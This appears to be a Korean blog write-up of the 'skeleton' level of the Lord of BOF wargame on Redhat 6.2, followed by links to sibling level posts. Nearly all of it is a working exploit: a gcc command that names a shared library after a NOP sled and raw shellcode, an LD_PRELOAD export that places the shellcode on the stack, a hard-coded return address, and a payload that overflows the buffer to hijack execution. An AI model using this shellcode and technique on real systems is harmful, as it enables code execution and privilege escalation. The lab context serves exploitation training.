skeleton - stack destroyer
Stack : LD_PRELOAD + i[4] + buffer[40] + sfp[4] + ret[4]
Shared library : gcc -shared -fPIC -o `python -c 'print "\x90"*100 + "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'` golem.c
Set LD_PRELOAD : export LD_PRELOAD=`python -c 'print "/home/skeleton/" + "\x90"*100 + "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'`
return address : 0xbffff58b
Payload : ./golem `python -c 'print "A"*44 + "\x8b\xf5\xff\xbf"'`
Using Shared library + LD_PRELOAD
'Wargames > Load Of BOF' 카테고리의 다른 글
| LOB Redhat 6.2 - darkknight (0) | 2015.10.29 |
|---|---|
| LOB Redhat 6.2 - golem (0) | 2015.10.29 |
| LOB Redhat 6.2 - vampire (0) | 2015.10.24 |
| LOB Redhat 6.2 - troll (0) | 2015.10.24 |
| LOB Redhat 6.2 - orge (0) | 2015.10.24 |
